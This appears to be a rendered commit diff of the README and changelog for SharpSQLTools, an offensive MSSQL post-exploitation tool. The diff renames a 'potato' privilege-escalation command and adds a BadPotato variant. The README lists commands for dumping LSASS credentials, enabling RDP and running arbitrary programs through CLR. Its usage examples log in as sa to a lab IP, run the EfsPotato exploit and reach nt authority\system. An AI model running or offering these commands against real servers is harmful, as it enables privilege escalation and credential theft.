66
77### 更新日志
88
9+ - 2021-08-05
10+ - 添加clr_badpotato
11+ - 修改原来的clr_potato为clr_efspotato
12+
913- 2021-08-04
1014 - 添加一些clr实现的基本命令:pwd,ls,netstat,ps等等
1115 - 致谢[ KevinJClark@csharptoolbox] ( https://gitlab.com/KevinJClark/csharptoolbox/-/tree/master/WindowsBinaryReplacements ) & [ rabbittb] ( https://github.com/rabbittb )
1216
1317- 2021-08-03
14- - 添加clr_potato
18+ - 添加clr_efspotato
1519 - 致谢[ zcgonvh@EfsPotato] ( https://github.com/zcgonvh/EfsPotato ) & [ hl0rey] ( https://github.com/hl0rey )
1620
1721- 2021-07-10
@@ -73,7 +77,8 @@ clr_ping {host} - ping by clr
7377clr_cat {file} - view file contents by clr
7478clr_rm {file} - delete file by clr
7579clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
76- clr_potato {cmd} - exec by EfsPotato like clr_exec
80+ clr_efspotato {cmd} - exec by EfsPotato like clr_exec
81+ clr_badpotato {cmd} - exec by BadPotato like clr_exec
7782clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
7883clr_dumplsass {path} - dumplsass by clr
7984clr_rdp - check RDP port and Enable RDP
@@ -148,10 +153,10 @@ nt service\mssql$sqlexpress
148153
149154```
150155
151- #### clr_potato
156+ #### clr_efspotato or clr_badpotato
152157
153158```
154- λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato whoami
159+ λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato whoami
155160[*] Database connection is successful!
156161Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
157162Part of GMH's fuck Tools, Code By zcgonvh.
@@ -165,7 +170,7 @@ Part of GMH's fuck Tools, Code By zcgonvh.
165170
166171nt authority\system
167172
168- λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\windows/system32\whoami.exe
173+ λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\windows/system32\whoami.exe
169174[*] Database connection is successful!
170175Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
171176Part of GMH's fuck Tools, Code By zcgonvh.
@@ -179,7 +184,7 @@ Part of GMH's fuck Tools, Code By zcgonvh.
179184
180185nt authority\system
181186
182- λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\cmd.exe -a /c whoami
187+ λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\cmd.exe -a /c whoami
183188[*] Database connection is successful!
184189Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
185190Part of GMH's fuck Tools, Code By zcgonvh.
0 commit comments